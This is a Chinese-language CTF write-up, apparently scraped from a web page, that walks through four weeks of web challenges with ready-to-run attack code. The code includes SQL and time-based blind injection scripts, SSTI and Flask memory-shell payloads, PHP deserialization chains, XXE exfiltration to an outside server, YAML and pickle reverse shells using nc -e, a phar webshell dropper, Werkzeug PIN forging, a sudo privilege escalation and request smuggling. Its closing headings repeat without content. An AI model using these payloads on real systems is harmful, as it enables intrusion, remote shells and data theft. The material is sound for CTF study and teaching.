2025?CTF Web题目综合解析与攻防技术详解<\/h1>

概述<\/h2>
本文档系统分析2025?CTF比赛中Week1-4的Web题目解题思路，涵盖多种Web安全漏洞类型和攻击技术。<\/p>

Week1 题目解析<\/h2>

1. Gitttttttt<\/h3>
漏洞类型<\/strong>：Git信息泄露
攻击方法<\/strong>：<\/p>
python GitHack.py http:\/\/challenge.ilovectf.cn:30746\/.git
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

利用.git目录泄露获取源码<\/li>
GitHack工具自动恢复版本历史<\/li>
<\/ul>
2. Ping??<\/h3>
漏洞类型<\/strong>：SSRF（服务端请求伪造）

技术要点<\/strong>：<\/p>

题目存在设计问题，需使用代码发送POST请求<\/li>
需要构造特定的HTTP头绕过检测<\/li>
<\/ul>
3. from_http<\/h3>
漏洞类型<\/strong>：HTTP头注入

攻击代码<\/strong>：<\/p>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>def<\/span> send_ctf_request<\/span>():
<\/span><\/span>    url =<\/span> "http:\/\/challenge.ilovectf.cn:30823\/"<\/span>
<\/span><\/span>    headers =<\/span> {
<\/span><\/span>        "Referer"<\/span>: "?CTF"<\/span>,
<\/span><\/span>        "User-Agent"<\/span>: "?CTFBrowser"<\/span>,
<\/span><\/span>        "Cookie"<\/span>: "wishu=happiness"<\/span>,
<\/span><\/span>        "X-Forwarded-For"<\/span>: "127.0.0.1"<\/span>
<\/span><\/span>    }
<\/span><\/span>    params =<\/span> {"welcome"<\/span>: "to"<\/span>}
<\/span><\/span>    data =<\/span> {"the"<\/span>: "?CTF"<\/span>}
<\/span><\/span>    
<\/span><\/span>    response =<\/span> requests.<\/span>post(url, params=<\/span>params, data=<\/span>data, headers=<\/span>headers)
<\/span><\/span>    return<\/span> response
<\/span><\/span><\/code><\/pre>4. secret of php<\/h3>
漏洞类型<\/strong>：PHP类型混淆+MD5碰撞

解题步骤<\/strong>：<\/p>
第一关<\/strong>：八进制绕过<\/p>
a=03751  # 八进制03751 = 十进制2025
<\/code><\/pre>
第二关<\/strong>：MD5弱类型比较+强类型比较<\/p>
<?<\/span>php<\/span>
<\/span><\/span>\/\/ 第一层：数组绕过MD5弱比较
<\/span><\/span><\/span><\/span>$a[]=<\/span>1<\/span>&<\/span>b<\/span>[]=<\/span>2<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 第二层：数组绕过强比较
<\/span><\/span><\/span><\/span>aa<\/span>[]=<\/span>1<\/span>&<\/span>bb<\/span>[]=<\/span>2<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 第三层：构造MD5碰撞
<\/span><\/span><\/span><\/span>aaa<\/span>=<\/span>psycho<\/span>%<\/span>0<\/span>A<\/span>%<\/span>00.<\/span>..<\/span>特殊构造的碰撞字符串<\/span>...<\/span>
<\/span><\/span>bbb<\/span>=<\/span>psycho<\/span>%<\/span>0<\/span>A<\/span>%<\/span>00.<\/span>..<\/span>特殊构造的碰撞字符串<\/span>...<\/span>
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

MD5弱比较：0e<\/code>开头的哈希值会被当作科学计数法<\/li>
数组绕过：md5(array)<\/code>返回NULL，NULL==NULL<\/li>
精确碰撞：构造特殊字符串实现MD5强碰撞<\/li>
<\/ul>
5. 前端小游戏<\/h3>
漏洞类型<\/strong>：客户端数据篡改

攻击方法<\/strong>：<\/p>

搜索score参数进行解码<\/li>
修改游戏分数相关参数<\/li>
<\/ul>
6. 包含不明东西的食物？！<\/h3>
漏洞类型<\/strong>：目录遍历

攻击方法<\/strong>：<\/p>

使用..\/进行路径穿越<\/li>
读取系统敏感文件<\/li>
<\/ul>
Week2 题目解析<\/h2>
1. Look at the picture<\/h3>
漏洞类型<\/strong>：SSRF+文件读取

技术要点<\/strong>：<\/p>
信息收集<\/strong>：<\/p>

目录扫描发现www.zip源码泄露<\/li>
测试发现SSRF漏洞，但协议限制为HTTP<\/li>
<\/ul>
绕过方法<\/strong>：<\/p>
# 方法1：直接读取
url=php:\/\/filter\/resource=\/flag

# 方法2：编码转换绕过
url=php:!$filter\/convert.iconv.UTF-8.UTF-7\/resource=\/flag
<\/code><\/pre>
2. Only Picture Up<\/h3>
漏洞类型<\/strong>：文件上传漏洞

攻击方法<\/strong>：<\/p>

修改文件后缀上传Webshell<\/li>
后端存在include包含漏洞，可直接执行恶意代码<\/li>
<\/ul>
3. Regular Expression<\/h3>
漏洞类型<\/strong>：正则表达式绕过

解题步骤<\/strong>：<\/p>
第一层正则匹配<\/strong>：<\/p>
\/^-(ctf|CTF)<\n>{5}[h-l]\d\d\W+@email\.com flag.\b$\/
<\/code><\/pre>
Payload构造<\/strong>：<\/p>
?=-ctf<
>>>>>h12!!!!!!!!!!@email.com flag0
<\/code><\/pre>
第二层正则构造<\/strong>：<\/p>
preg=||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||.*<\/span>
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

使用实际换行符（%0A）<\/li>
\W+匹配非单词字符凑长度<\/li>
{5}表示前面字符重复5次<\/li>
末尾flag.\b要求最后一个字符是单词字符<\/li>
<\/ul>
4. 留言板<\/h3>
漏洞类型<\/strong>：SSTI（服务端模板注入）

攻击方法<\/strong>：<\/p>
# 方法1：使用request绕过过滤
{{get_flashed_messages.__globals__.os.popen(request.form.cmd).read()}}&cmd=cat \/flag

# 方法2：使用joiner绕过
{{joiner.__init__.__globals__.os.popen(request.form.cmd).read()}}&cmd=cat \/flag
<\/code><\/pre>
技术要点<\/strong>：<\/p>

过滤了lipsum、cycler和引号<\/li>
使用request对象绕过过滤<\/li>
利用__globals__访问os模块<\/li>
<\/ul>
5. 登录和查询<\/h3>
漏洞类型<\/strong>：SQL盲注

解题步骤<\/strong>：<\/p>
登录阶段<\/strong>：<\/p>

弱密码：admin\/admin123<\/li>
使用题目提供的字典进行爆破<\/li>
<\/ul>
SQL注入<\/strong>：<\/p>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>base_url =<\/span> "http:\/\/challenge.ilovectf.cn:30830\/flag.php"<\/span>
<\/span><\/span>result =<\/span> ""<\/span>
<\/span><\/span>
<\/span><\/span># 布尔盲注脚本<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(1<\/span>, 100<\/span>):
<\/span><\/span>    low, high =<\/span> 32<\/span>, 126<\/span>
<\/span><\/span>    while<\/span> low <<\/span> high:
<\/span><\/span>        mid =<\/span> (low +<\/span> high) \/\/<\/span> 2<\/span>
<\/span><\/span>        # 构造注入payload<\/span>
<\/span><\/span>        payload =<\/span> "sElect group_concat(flag) FRom `flags`"<\/span>
<\/span><\/span>        url =<\/span> f<\/span>"<\/span>{<\/span>base_url}<\/span>?id=1' And Ord(sUbstr((<\/span>{<\/span>payload}<\/span>),<\/span>{<\/span>i}<\/span>,1))><\/span>{<\/span>mid}<\/span>--+"<\/span>
<\/span><\/span>        
<\/span><\/span>        cookies =<\/span> {'PHPSESSID'<\/span>: 'session_id'<\/span>}
<\/span><\/span>        r =<\/span> requests.<\/span>get(url, cookies=<\/span>cookies)
<\/span><\/span>        
<\/span><\/span>        if<\/span> 'success_indicator'<\/span> in<\/span> r.<\/span>text:
<\/span><\/span>            low =<\/span> mid +<\/span> 1<\/span>
<\/span><\/span>        else<\/span>:
<\/span><\/span>            high =<\/span> mid
<\/span><\/span>    
<\/span><\/span>    if<\/span> low !=<\/span> 32<\/span>:
<\/span><\/span>        result +=<\/span> chr(low)
<\/span><\/span>        print(f<\/span>"Current result: <\/span>{<\/span>result}<\/span>"<\/span>)
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

注入点：id参数，无过滤<\/li>
使用反引号绕过关键字检测：flags<\/code><\/li>
布尔盲注基于页面响应差异<\/li>
<\/ul>
6. 这是什么函数<\/h3>
漏洞类型<\/strong>：Python原型污染

攻击方法<\/strong>：<\/p>
信息收集<\/strong>：<\/p>

目录爆破发现\/src路径<\/li>
获取源码分析漏洞点<\/li>
<\/ul>
Payload构造<\/strong>：<\/p>
{
<\/span><\/span>    "__init__"<\/span>: {
<\/span><\/span>        "__globals__"<\/span>: {
<\/span><\/span>            "cat"<\/span>: "how to get the flag?"<\/span>
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

利用__init__.__globals__污染全局变量<\/li>
访问\/flag路径获取flag<\/li>
<\/ul>
Week3 题目解析<\/h2>
1. 这又是什么函数<\/h3>
漏洞类型<\/strong>：Python代码执行+盲注

源码分析<\/strong>：<\/p>
@app<\/span>.<\/span>route('\/doit'<\/span>, methods=<\/span>['GET'<\/span>, 'POST'<\/span>])
<\/span><\/span>def<\/span> doit<\/span>():
<\/span><\/span>    e=<\/span>request.<\/span>form.<\/span>get('e'<\/span>)
<\/span><\/span>    try<\/span>:
<\/span><\/span>        eval(e)  # 关键漏洞点<\/span>
<\/span><\/span>        return<\/span> "done!"<\/span>
<\/span><\/span>    except<\/span>:
<\/span><\/span>        return<\/span> "error!"<\/span>
<\/span><\/span><\/code><\/pre>攻击方法1：时间盲注<\/strong><\/p>
import<\/span> requests
<\/span><\/span>import<\/span> string
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/challenge.ilovectf.cn:30621\/doit"<\/span>
<\/span><\/span>flag =<\/span> ""<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> position in<\/span> range(1<\/span>, 50<\/span>):
<\/span><\/span>    low, high =<\/span> 32<\/span>, 127<\/span>
<\/span><\/span>    while<\/span> low <<\/span> high:
<\/span><\/span>        mid =<\/span> (low +<\/span> high) \/\/<\/span> 2<\/span>
<\/span><\/span>        payload =<\/span> f<\/span>"__import__('time').sleep(2) if ord(open('\/flag').read()[<\/span>{<\/span>position-<\/span>1<\/span>}<\/span>])><\/span>{<\/span>mid}<\/span> else None"<\/span>
<\/span><\/span>        
<\/span><\/span>        data =<\/span> {'e'<\/span>: payload}
<\/span><\/span>        try<\/span>:
<\/span><\/span>            r =<\/span> requests.<\/span>post(url, data=<\/span>data, timeout=<\/span>3<\/span>)
<\/span><\/span>            if<\/span> r.<\/span>elapsed.<\/span>total_seconds() ><\/span> 2<\/span>:
<\/span><\/span>                low =<\/span> mid +<\/span> 1<\/span>
<\/span><\/span>            else<\/span>:
<\/span><\/span>                high =<\/span> mid
<\/span><\/span>        except<\/span> requests.<\/span>Timeout:
<\/span><\/span>            low =<\/span> mid +<\/span> 1<\/span>
<\/span><\/span>    
<\/span><\/span>    flag +=<\/span> chr(low)
<\/span><\/span>    print(f<\/span>"Current flag: <\/span>{<\/span>flag}<\/span>"<\/span>)
<\/span><\/span><\/code><\/pre>攻击方法2：Pickle内存马<\/strong><\/p>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/challenge.ilovectf.cn:30775"<\/span>
<\/span><\/span>payload =<\/span> {
<\/span><\/span>    'e'<\/span>: """eval("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None, []).append(lambda :__import__('os').popen(request.args.get('0')).read())")"""<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span># 注入内存马<\/span>
<\/span><\/span>requests.<\/span>post(f<\/span>"<\/span>{<\/span>url}<\/span>\/doit"<\/span>, data=<\/span>payload)
<\/span><\/span>
<\/span><\/span># 执行命令<\/span>
<\/span><\/span>requests.<\/span>get(f<\/span>"<\/span>{<\/span>url}<\/span>\/?0=cat \/flag"<\/span>)
<\/span><\/span><\/code><\/pre>2. 魔术大杂烩烩<\/h3>
漏洞类型<\/strong>：PHP反序列化POP链

POP链构造<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> Wuhuarou<\/span>{
<\/span><\/span>    public<\/span> $Wuhuarou;
<\/span><\/span>    function<\/span> __wakeup(){
<\/span><\/span>        echo<\/span> $this-><\/span>Wuhuarou<\/span>;  \/\/ 触发__toString
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Fentiao<\/span>{
<\/span><\/span>    public<\/span> $Fentiao;
<\/span><\/span>    public<\/span> $Hongshufentiao;
<\/span><\/span>    public<\/span> function<\/span> __toString(){
<\/span><\/span>        return<\/span> $this-><\/span>Fentiao<\/span>-><\/span>Hongshufentiao<\/span>;  \/\/ 触发__get
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Baicai<\/span>{
<\/span><\/span>    public<\/span> $Baicai;
<\/span><\/span>    public<\/span> function<\/span> __get($key){
<\/span><\/span>        $Baicai =<\/span> $this-><\/span>Baicai<\/span>;
<\/span><\/span>        return<\/span> $Baicai();  \/\/ 触发__invoke
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Wanzi<\/span>{
<\/span><\/span>    public<\/span> $Wanzi;
<\/span><\/span>    public<\/span> function<\/span> __invoke(){
<\/span><\/span>        return<\/span> $this-><\/span>Wanzi<\/span>-><\/span>Xianggu<\/span>();  \/\/ 触发目标方法
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. mysql管理工具<\/h3>
漏洞类型<\/strong>：MySQL任意文件读取+YAML反序列化

攻击流程<\/strong>：<\/p>
步骤1：JWT伪造<\/strong><\/p>
import<\/span> jwt
<\/span><\/span>import<\/span> datetime
<\/span><\/span>
<\/span><\/span>headers =<\/span> {"alg"<\/span>: "HS256"<\/span>, "typ"<\/span>: "JWT"<\/span>}
<\/span><\/span>token_dict =<\/span> {"username"<\/span>: "admin"<\/span>, "exp"<\/span>: 1762334799<\/span>}
<\/span><\/span>secret =<\/span> 'jH84'<\/span>  # 爆破得到的密钥<\/span>
<\/span><\/span>jwt_token =<\/span> jwt.<\/span>encode(token_dict, secret, algorithm=<\/span>'HS256'<\/span>, headers=<\/span>headers)
<\/span><\/span><\/code><\/pre>步骤2：MySQL任意文件读取<\/strong><\/p>

原理：伪造MySQL服务器，利用LOAD DATA LOCAL INFILE读取文件<\/li>
工具：Rogue-MySql-Server<\/li>
读取目标：\/etc\/passwd、应用源码等<\/li>
<\/ul>
步骤3：YAML反序列化<\/strong><\/p>
import<\/span> requests
<\/span><\/span>import<\/span> urllib.parse
<\/span><\/span>
<\/span><\/span># 反弹shell payload<\/span>
<\/span><\/span>payload =<\/span> """!!python\/object\/apply:subprocess.call [['\/bin\/busybox','nc','YOUR_IP','PORT','-e','\/bin\/sh']]"""<\/span>
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/challenge.ilovectf.cn:30750\/uneed1t"<\/span>
<\/span><\/span>params =<\/span> {'data'<\/span>: payload}
<\/span><\/span>response =<\/span> requests.<\/span>get(url, params=<\/span>params)
<\/span><\/span><\/code><\/pre>替代方案<\/strong>：写文件执行<\/p>
!!python\/object\/apply:subprocess.Popen<\/span>
<\/span><\/span>- ["sh"<\/span>,"-c"<\/span>,"cat \/f* >1.txt"<\/span>]
<\/span><\/span><\/code><\/pre>4. VIP<\/h3>
漏洞类型<\/strong>：Go模板注入+环境变量注入

攻击步骤<\/strong>：<\/p>
步骤1：读取API Key<\/strong><\/p>
# 方法1：读取环境变量
{{.Utils.ReadAll (.Utils.GetReader "\/proc\/self\/environ")}}

# 方法2：读取密钥文件
{{.Utils.ReadAll (.Utils.GetReader "\/app\/secret_key.txt")}}
<\/code><\/pre>
步骤2：环境变量注入RCE<\/strong><\/p>
{
<\/span><\/span>    "env"<\/span>: {
<\/span><\/span>        "GOOS"<\/span>: "linux"<\/span>,
<\/span><\/span>        "GOARCH"<\/span>: "amd64"<\/span>, 
<\/span><\/span>        "CGO_ENABLED"<\/span>: "1"<\/span>,
<\/span><\/span>        "CC"<\/span>: "\/bin\/sh -c \"ls -al \/ >&2; false\""<\/span>,
<\/span><\/span>        "GOGCCFLAGS"<\/span>: ""<\/span>
<\/span><\/span>    },
<\/span><\/span>    "code"<\/span>: "package main\n\/\/ C代码部分\nimport \"C\"\nfunc main() {}"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

利用Go编译过程的环境变量注入<\/li>
通过CC参数执行系统命令<\/li>
使用false确保编译失败输出错误信息<\/li>
<\/ul>
5. 查查忆<\/h3>
漏洞类型<\/strong>：无回显XXE+编码绕过

攻击方法<\/strong>：<\/p>
1.xml（攻击载荷）<\/strong>：<\/p>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><!DOCTYPE a [
<\/span><\/span><\/span><!ENTITY % dtd SYSTEM "http:\/\/YOUR_SERVER\/1.dtd"><\/span>
<\/span><\/span>%dtd;%code;%send;
<\/span><\/span>]>
<\/span><\/span><\/code><\/pre>1.dtd（外部实体）<\/strong>：<\/p>
<!ENTITY % file SYSTEM "php:\/\/filter\/read=convert.base64-encode\/resource=\/f1111llllaa44g"><\/span>
<\/span><\/span><!ENTITY % code "<!ENTITY &#x25; send SYSTEM 'http:\/\/YOUR_SERVER:5000\/%file;'><\/span>">
<\/span><\/span><\/code><\/pre>编码绕过WAF<\/strong>：<\/p>
cat 1.xml | iconv -f utf-8 -t utf-7 > payload.xml
<\/span><\/span><\/code><\/pre>最终Payload<\/strong>：<\/p>
<?xml version="1.0" encoding="UTF-7"?><\/span>
<\/span><\/span>+ADwAIQ-DOCTYPE a +AFs
<\/span><\/span>+ADwAIQ-ENTITY +ACU dtd SYSTEM +ACI-http:\/\/YOUR_SERVER\/1.dtd+ACIAPg
<\/span><\/span>+ACU-dtd+ADsAJQ-code+ADsAJQ-send+ADs
<\/span><\/span>+AF0APg-
<\/span><\/span><\/code><\/pre>6. ezphp<\/h3>
漏洞类型<\/strong>：无字母数字RCE+通配符绕过

解题方法<\/strong>：<\/p>
利用取反绕过字符限制<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>echo<\/span> urlencode<\/span>(~<\/span>'>cat'<\/span>);  \/\/ %C1%9C%9E%8B
<\/span><\/span><\/span><\/span>echo<\/span> urlencode<\/span>(~<\/span>'* >='<\/span>);  \/\/ %D5%DF%C1%C2
<\/span><\/span><\/span><\/code><\/pre>攻击步骤<\/strong>：<\/p>
# 步骤1：创建文件<\/span>
<\/span><\/span>$_=<\/span>~%C1%9C%9E%8B;`<\/span>$_`<\/span>;    # 执行 >cat<\/span>
<\/span><\/span>$_=<\/span>~%D5%DF%C1%C2;`<\/span>$_`<\/span>;    # 执行 * >=<\/span>
<\/span><\/span>
<\/span><\/span># 步骤2：利用通配符执行命令<\/span>
<\/span><\/span>>cat
<\/span><\/span>>flag.php
<\/span><\/span>*   # 等同于 cat flag.php<\/span>
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

利用~取反运算符绕过字符过滤<\/li>
通配符*将第一个文件名作为命令，其余作为参数<\/li>
字符长度限制为14个字符<\/li>
<\/ul>
Week4 题目解析<\/h2>
1. Path to Hero<\/h3>
漏洞类型<\/strong>：PHP反序列化

POP链利用<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> Start<\/span> {
<\/span><\/span>    public<\/span> $ishero =<\/span> "hero1"<\/span>;  \/\/ 包含hero但不等于hero
<\/span><\/span><\/span><\/span>    public<\/span> $adventure;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Sword<\/span> {
<\/span><\/span>    public<\/span> $test1 =<\/span> "QNKCDZO"<\/span>;  \/\/ MD5: 0e830400451993494058024219903391
<\/span><\/span><\/span><\/span>    public<\/span> $test2 =<\/span> "240610708"<\/span>; \/\/ MD5: 0e462097431906509019562988736854
<\/span><\/span><\/span><\/span>    public<\/span> $go =<\/span> "cat \/flag"<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 好像什么都能读<\/h3>
漏洞类型<\/strong>：Flask Debug PIN计算

计算PIN的必要条件<\/strong>：<\/p>

username：从\/etc\/passwd获取（ctf）<\/li>
modname：flask.app<\/li>
appname：Flask<\/li>
moddir：Flask库路径（通过报错获取）<\/li>
uuidnode：MAC地址十进制（\/sys\/class\/net\/eth0\/address）<\/li>
machine_id：机器ID组合<\/li>
<\/ol>
计算过程<\/strong>：<\/p>
import<\/span> hashlib
<\/span><\/span>from<\/span> itertools import<\/span> chain
<\/span><\/span>
<\/span><\/span>probably_public_bits =<\/span> [
<\/span><\/span>    'ctf'<\/span>,
<\/span><\/span>    'flask.app'<\/span>, 
<\/span><\/span>    'Flask'<\/span>,
<\/span><\/span>    '\/home\/ctf\/.local\/lib\/python3.13\/site-packages\/flask\/app.py'<\/span>
<\/span><\/span>]
<\/span><\/span>
<\/span><\/span>private_bits =<\/span> [
<\/span><\/span>    '100034049800637'<\/span>,  # MAC地址十进制<\/span>
<\/span><\/span>    '89b34b88-6f33-4c4b-8a30-69a4ba41fd0e'<\/span>  # machine_id<\/span>
<\/span><\/span>]
<\/span><\/span>
<\/span><\/span># PIN计算算法<\/span>
<\/span><\/span>h =<\/span> hashlib.<\/span>sha1()
<\/span><\/span>for<\/span> bit in<\/span> chain(probably_public_bits, private_bits):
<\/span><\/span>    if<\/span> bit:
<\/span><\/span>        h.<\/span>update(bit.<\/span>encode('utf-8'<\/span>) if<\/span> isinstance(bit, str) else<\/span> bit)
<\/span><\/span>
<\/span><\/span>h.<\/span>update(b<\/span>'cookiesalt'<\/span>)
<\/span><\/span>cookie_name =<\/span> '__wzd'<\/span> +<\/span> h.<\/span>hexdigest()[:20<\/span>]
<\/span><\/span>
<\/span><\/span>h.<\/span>update(b<\/span>'pinsalt'<\/span>)
<\/span><\/span>num =<\/span> ('<\/span>%09d<\/span>'<\/span> %<\/span> int(h.<\/span>hexdigest(), 16<\/span>))[:9<\/span>]
<\/span><\/span>
<\/span><\/span># 最终PIN格式：804-332-693<\/span>
<\/span><\/span><\/code><\/pre>利用方法<\/strong>：<\/p>
\/console?__debugger__=yes&cmd=__import__('os').popen('cat \/fl*').read()&frm=0&s=SECRET_KEY
<\/code><\/pre>
3. 这又又是什么函数<\/h3>
漏洞类型<\/strong>：Python pickle反序列化

攻击方法<\/strong>：<\/p>
方法1：反弹Shell<\/strong><\/p>
import<\/span> pickle
<\/span><\/span>import<\/span> base64
<\/span><\/span>
<\/span><\/span>class<\/span> Exploit<\/span>:
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        import<\/span> subprocess
<\/span><\/span>        return<\/span> (subprocess.<\/span>Popen, (['nc'<\/span>, '-e'<\/span>, '\/bin\/bash'<\/span>, 'IP'<\/span>, 'PORT'<\/span>],))
<\/span><\/span>
<\/span><\/span>payload =<\/span> pickle.<\/span>dumps(Exploit(), protocol=<\/span>0<\/span>)  # 协议0绕过黑名单<\/span>
<\/span><\/span>b64_payload =<\/span> base64.<\/span>b64encode(payload).<\/span>decode()
<\/span><\/span><\/code><\/pre>方法2：内存马注入<\/strong><\/p>
import<\/span> base64
<\/span><\/span>
<\/span><\/span>opcode =<\/span> b<\/span>'''cbuiltins
<\/span><\/span><\/span>exec
<\/span><\/span><\/span>(S'global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:open(<\/span>\'<\/span>\/flag<\/span>\'<\/span>).read()'
<\/span><\/span><\/span>tR.'''<\/span>
<\/span><\/span>
<\/span><\/span>payload =<\/span> base64.<\/span>b64encode(opcode).<\/span>decode()
<\/span><\/span><\/code><\/pre>黑名单绕过<\/strong>：<\/p>

使用协议0（文本协议）绕过b'\x80'检测<\/li>
利用error_handler_spec注册错误处理函数<\/li>
<\/ul>
4. 来getshell 速度!<\/h3>
漏洞类型<\/strong>：文件上传+SUID提权

攻击步骤<\/strong>：<\/p>
步骤1：Phar文件上传<\/strong><\/p>
<?<\/span>php<\/span>
<\/span><\/span>$phar =<\/span> new<\/span> Phar<\/span>('exp.phar'<\/span>);
<\/span><\/span>$phar-><\/span>compressFiles<\/span>(Phar<\/span>::<\/span>GZ<\/span>);
<\/span><\/span>$phar-><\/span>startBuffering<\/span>();
<\/span><\/span>
<\/span><\/span>$stub =<\/span> '<?php $filename="\/var\/www\/html\/shell.php"; $content="<?php eval(\$_POST[1]);?>"; file_put_contents($filename, $content); __HALT_COMPILER(); ?>'<\/span>;
<\/span><\/span>
<\/span><\/span>$phar-><\/span>setStub<\/span>($stub);
<\/span><\/span>$phar-><\/span>addFromString<\/span>('test.txt'<\/span>, 'test'<\/span>);
<\/span><\/span>$phar-><\/span>stopBuffering<\/span>();
<\/span><\/span>
<\/span><\/span>\/\/ GZ压缩绕过检测
<\/span><\/span><\/span><\/span>$fp =<\/span> gzopen<\/span>("exp.phar.gz"<\/span>, 'w9'<\/span>);
<\/span><\/span>gzwrite<\/span>($fp, file_get_contents<\/span>("exp.phar"<\/span>));
<\/span><\/span>gzclose<\/span>($fp);
<\/span><\/span><\/code><\/pre>步骤2：文件包含触发<\/strong><\/p>
url=exp.phar.gz
<\/code><\/pre>
步骤3：SUID提权（CVE-2025-32462）<\/strong><\/p>
1<\/span>=<\/span>system<\/span>('sudo -h asd.asd.asd cat \/f*'<\/span>);
<\/span><\/span><\/code><\/pre>漏洞原理<\/strong>：<\/p>

sudo版本1.8.8-1.8.32或1.9.0-1.9.17存在漏洞<\/li>
配置：www-data asd.asd.asd = NOPASSWD:ALL<\/code><\/li>
利用-h参数绕过本地权限限制<\/li>
<\/ul>
5. android or apple<\/h3>
漏洞类型<\/strong>：SSRF+MySQL注入

攻击链分析<\/strong>：<\/p>
漏洞点<\/strong>：<\/p>
$imageData =<\/span> $processor-><\/span>fetch<\/span>('dynamic_qr_code'<\/span>);
<\/span><\/span>\/\/ 可控点：$_SERVER['HTTP_X_VERIFY_CODE_URL']
<\/span><\/span><\/span><\/code><\/pre>SSRF利用<\/strong>：<\/p>

协议限制：fsockopen支持gopher协议<\/li>
目标发现：MySQL服务在3306端口<\/li>
<\/ul>
Gopherus攻击<\/strong>：<\/p>
python2 gopherus.py --exploit mysql
<\/span><\/span><\/code><\/pre>Payload构造<\/strong>：<\/p>
gopher:\/\/127.0.0.1:3306\/_AUTH_PACKET_SQL_INJECTION_PAYLOAD
<\/code><\/pre>
技术要点<\/strong>：<\/p>

fsockopen不依赖_字符，直接发送原始TCP数据<\/li>
去除gopherus生成的_前缀<\/li>
通过二维码结果读取查询结果<\/li>
<\/ul>
6. waf?waf!<\/h3>
漏洞类型<\/strong>：HTTP请求走私

漏洞原理<\/strong>：<\/p>

前端代理：检测到Transfer-Encoding头就按chunked解析<\/li>
后端Flask：对未知Transfer-Encoding值使用Content-Length<\/li>
<\/ul>
攻击Payload<\/strong>：<\/p>
POST<\/span> \/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span>Transfer-Encoding:<\/span> xxx<\/span>
<\/span><\/span>Content-Length:<\/span> 49<\/span>
<\/span><\/span>
<\/span><\/span>0
<\/span><\/span>
<\/span><\/span>&calc=__import__("os").popen("cat \/f*").read()
<\/span><\/span><\/code><\/pre>技术要点<\/strong>：<\/p>

使用0作为chunked结束标记<\/li>
代理解析0后停止，后端解析完整Content-Length<\/li>
绕过WAF检测执行命令<\/li>
<\/ul>
总结<\/h2>
本CTF比赛涵盖了Web安全的多个重要领域，包括但不限于：<\/p>

信息泄露漏洞（Git、源码）<\/li>
各种注入漏洞（SQL、SSTI、XXE）<\/li>
文件相关漏洞（上传、包含、读取）<\/li>
反序列化漏洞（PHP、Python）<\/li>
服务端漏洞（SSRF、RCE）<\/li>
协议级攻击（HTTP走私、MySQL协议）<\/li>
<\/ol>
每种漏洞类型都展示了独特的绕过技巧和利用方法，为Web安全研究提供了宝贵的学习材料。<\/p>
2025?CTF Web题目综合解析与攻防技术详解<\/h1>

概述<\/h2> 本文档系统分析2025?CTF比赛中Week1-4的Web题目解题思路，涵盖多种Web安全漏洞类型和攻击技术。<\/p>

Week1 题目解析<\/h2>

Week2 题目解析<\/h2>

Week3 题目解析<\/h2>

Week4 题目解析<\/h2>

概述<\/h2>
本文档系统分析2025?CTF比赛中Week1-4的Web题目解题思路，涵盖多种Web安全漏洞类型和攻击技术。<\/p>
